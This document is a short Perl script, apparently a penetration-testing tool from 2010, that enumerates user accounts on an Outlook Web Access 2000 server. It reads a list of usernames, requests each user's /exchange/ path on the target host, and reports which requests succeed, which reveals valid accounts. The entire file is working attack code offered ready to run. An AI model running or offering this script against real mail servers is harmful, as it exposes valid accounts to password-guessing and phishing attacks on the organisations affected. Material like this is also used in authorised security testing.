#!/usr/bin/perl
#
#####################################################################
# Outlook Web Access Light - Address Book Enumeration 
#####################################################################
#
# Copyright (C) 2010 Joe Mondloch
# JoMo-Kun / jmk@foofus.net
#
# ...odd OWA 2000 with 5.5 frontend, allows enumeration of users...
#

use LWP::UserAgent;
use HTTP::Cookies;

$ua = new LWP::UserAgent;

if ($#ARGV != 1) {
        print "Usage: $0 Host UserFile\n";
        exit(1);
}
                                                                                                       
$host = $ARGV[0];
$userfile = $ARGV[1];

open(HAND,"$userfile") || die("Failed to open: $userfile $!");
while(<HAND>) {
  @line = split /@/;
  $user = $line[0];
  chomp($user);
  
  $req = new HTTP::Request GET => "https://$host/exchange/$user";
  my $res = $ua->request($req);

  print "OWA: host->$host user->$user ";
  if ($res->is_success) { print "Success\n"; }
  else { print $res->status_line, "\n"; }  
}
close(HAND);